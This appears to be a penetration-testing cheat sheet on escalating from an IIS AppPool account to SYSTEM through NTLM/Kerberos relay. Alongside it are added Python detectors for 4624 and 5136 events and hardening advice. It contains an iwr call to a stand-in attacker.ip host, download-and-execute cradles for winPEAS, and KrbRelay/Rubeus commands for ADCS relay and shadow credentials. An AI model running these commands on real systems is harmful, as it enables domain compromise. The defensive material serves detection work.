Did you know you don't need a Potato exploit to go from the IIS AppPool account to admin or SYSTEM? Simply use:

powershell iwr http://attacker.ip -UseDefaultCredentials 

to coerce an HTTP authentication from the machine account (the AppPool identity authenticates on the network as the computer account).
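As an added detection example (not part of the original page and not from any tool it names): the coerced authentication above is only useful once it is replayed against a relay target, and that target's Security log records it as a 4624 network logon of a computer account coming from an address that is not the computer itself. The scanner below, written here for illustration, runs over constructed 4624 events exported as JSON lines and flags exactly that. The host names, addresses and the EXPECTED_IP inventory are assumptions.

```python
import json
from dataclasses import dataclass

# Constructed sample: Security-log 4624 (successful logon) events exported as
# JSON lines. Field names follow the real 4624 schema; hosts and IPs are made up.
SAMPLE_EVENTS = """\
{"EventID": 4624, "TargetUserName": "BRAAVOS$", "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.56.23", "WorkstationName": "BRAAVOS"}
{"EventID": 4624, "TargetUserName": "BRAAVOS$", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.99", "WorkstationName": "ATTACKER"}
{"EventID": 4624, "TargetUserName": "jon.snow", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.99", "WorkstationName": "ATTACKER"}
{"EventID": 4624, "TargetUserName": "MEEREEN$", "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.10", "WorkstationName": "MEEREEN"}
{"EventID": 4624, "TargetUserName": "BRAAVOS$", "LogonType": 2, "AuthenticationPackageName": "Negotiate", "IpAddress": "-", "WorkstationName": "BRAAVOS"}
"""

# Assumed inventory (hypothetical): the address each computer account normally
# authenticates from. In a real deployment this comes from DHCP/DNS/CMDB data.
EXPECTED_IP = {"BRAAVOS$": "192.168.56.23", "MEEREEN$": "192.168.56.10"}


@dataclass
class Finding:
    account: str
    source_ip: str
    workstation: str
    severity: str      # "high" = source address mismatch, "low" = NTLM only
    reasons: tuple


def analyse_logon(event, expected_ip):
    """Return a Finding when a 4624 looks like a relayed machine-account logon, else None."""
    # Only network logons (type 3) of machine accounts (name ending in $) matter here.
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return None
    account = event.get("TargetUserName", "")
    if not account.endswith("$"):
        return None

    src = event.get("IpAddress", "")
    expected = expected_ip.get(account)
    # Strongest signal: the computer account "logs on" from a host that is not itself,
    # which is what the relay target sees when a coerced authentication is replayed.
    mismatch = expected is not None and src != expected
    # Weaker signal: domain members normally use Kerberos between themselves, so NTLM
    # from a machine account is worth a look but is not conclusive on its own.
    ntlm = event.get("AuthenticationPackageName") == "NTLM"
    if not (mismatch or ntlm):
        return None

    reasons = []
    if mismatch:
        reasons.append(f"source {src} does not match expected {expected}")
    if ntlm:
        reasons.append("NTLM authentication by a machine account")
    return Finding(account, src, event.get("WorkstationName", ""),
                   "high" if mismatch else "low", tuple(reasons))


def scan(jsonl_text, expected_ip=EXPECTED_IP):
    """Parse JSON-lines events and return the findings in input order."""
    findings = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        finding = analyse_logon(json.loads(line), expected_ip)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.account} from {f.source_ip} ({f.workstation}): {'; '.join(f.reasons)}")
```

Note where to collect: the outbound request in the one-liner goes to attacker.ip, so the IIS host itself logs nothing useful; the 4624 of interest lands on whatever the authentication is relayed to (domain controller, ADCS web enrollment, file server), so this logic belongs on logs from those hosts. Enforcing SMB/LDAP signing, LDAP channel binding and Extended Protection on ADCS web enrollment removes the relay targets rather than merely detecting them.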

AMSI Bypass

winPEAS in Memory

# Download the assembly bytes and load them reflectively (the URL is elided on the original page)
$data=(New-Object System.Net.WebClient).DownloadData('');
$asm = [System.Reflection.Assembly]::Load([byte[]]$data);
# Save the current console writer and redirect console output to a StringWriter so the tool's output can be captured
$out = [Console]::Out;$sWriter = New-Object IO.StringWriter;[Console]::SetOut($sWriter);

# Alternative: the PowerSharpPack wrapper (the URL is elided on the original page)
iex(new-object net.webclient).downloadstring('')
PowerSharpPack -winPEAS


  • RBCD (by @an0n_r0)

  • Relay to ADCS web enrollment to request a certificate from the Machine template (by @t0-n1)

    # braavos is the server hosting the ADCS
    $krbrelay = .\KrbRelay.exe -spn http/braavos.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -endpoint certsrv -adcs 'Machine'
    $certificate = $krbrelay[-1]
    echo $certificate
    # The base64 encoded output is usable on `Rubeus.exe`'s `/certificate:<base64>`
    Invoke-Rubeus "asktgt /user:BRAAVOS$ /certificate:$certificate /nowrap"
  • Shadowcred (by @icyguider)

    # meereen is the domain controller
    .\KrbRelay.exe -spn ldap/meereen.essos.local -port 10 -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred
    # follow the output to use Rubeus
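As an added detection example covering both the RBCD and the Shadowcred outcomes above (not part of the original page and not from KrbRelay or Rubeus): both end in an LDAP write to the relayed computer's own object, to msDS-AllowedToActOnBehalfOfOtherIdentity or msDS-KeyCredentialLink respectively, and with "Audit Directory Service Changes" plus a SACL on computer objects the domain controller records each write as a 5136 event. The scanner below, written here for illustration, runs over constructed 5136 events exported as JSON lines and singles out a value being added to either attribute, rating it highest when the writer is the object's own machine account. The object names, subjects and attribute values are assumptions.

```python
import json
import re

# Attributes whose modification underpins the two KrbRelay outcomes discussed above.
SENSITIVE_ATTRIBUTES = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD",
    "msDS-KeyCredentialLink": "Shadow Credentials",
}
# 5136 reports OperationType as a resource string id: %%14674 = Value Added, %%14675 = Value Deleted.
VALUE_ADDED = "%%14674"

# Constructed sample of 5136 (directory service object modified) events as JSON lines.
# Field names follow the real 5136 schema; objects, subjects and values are made up.
SAMPLE_EVENTS = """\
{"EventID": 5136, "SubjectUserName": "BRAAVOS$", "ObjectDN": "CN=BRAAVOS,CN=Computers,DC=essos,DC=local", "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "AttributeValue": "<security descriptor, hex>", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "BRAAVOS$", "ObjectDN": "CN=BRAAVOS,CN=Computers,DC=essos,DC=local", "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "AttributeValue": "B:828:<key credential blob>:CN=BRAAVOS,CN=Computers,DC=essos,DC=local", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "admin.tyrion", "ObjectDN": "CN=BRAAVOS,CN=Computers,DC=essos,DC=local", "ObjectClass": "computer", "AttributeLDAPDisplayName": "description", "AttributeValue": "web server", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "admin.tyrion", "ObjectDN": "CN=LAPTOP-01,OU=Workstations,DC=essos,DC=local", "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "AttributeValue": "B:828:<key credential blob>:CN=LAPTOP-01,OU=Workstations,DC=essos,DC=local", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "admin.tyrion", "ObjectDN": "CN=BRAAVOS,CN=Computers,DC=essos,DC=local", "ObjectClass": "computer", "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "AttributeValue": "<security descriptor, hex>", "OperationType": "%%14675"}
"""


def cn_from_dn(dn):
    """Return the leading CN of a distinguished name, or '' if it has none."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else ""


def analyse_change(event):
    """Return a finding for a 5136 that adds a value to an RBCD or key-credential attribute, else None."""
    if event.get("EventID") != 5136 or event.get("OperationType") != VALUE_ADDED:
        return None
    technique = SENSITIVE_ATTRIBUTES.get(event.get("AttributeLDAPDisplayName", ""))
    if technique is None:
        return None
    subject = event.get("SubjectUserName", "")
    target = cn_from_dn(event.get("ObjectDN", ""))
    # A relayed machine account writes to its *own* computer object, so the subject is
    # the target's account name with a trailing $. Other writers (admins, enrolment
    # flows) are still reported, at a lower severity, for baselining.
    self_write = subject.endswith("$") and subject.rstrip("$").upper() == target.upper()
    return {
        "technique": technique,
        "object": target,
        "subject": subject,
        "self_write": self_write,
        "severity": "high" if self_write else "medium",
    }


def scan(jsonl_text):
    """Parse JSON-lines events and return the findings in input order."""
    findings = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        finding = analyse_change(json.loads(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['technique']}: {f['subject']} wrote to {f['object']}"
              f"{' (self-write)' if f['self_write'] else ''}")
```

Two caveats for operating this: 5136 is only emitted for attributes covered by a SACL, so audit the two attributes on computer objects explicitly; and msDS-KeyCredentialLink is also populated by legitimate key enrolment, so baseline which principals write it in your environment before alerting on every medium finding. Removing the write permission of computer accounts on their own msDS-KeyCredentialLink and msDS-AllowedToActOnBehalfOfOtherIdentity, and enforcing LDAP signing and channel binding on the domain controllers, closes the path rather than only observing it.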

Further Reading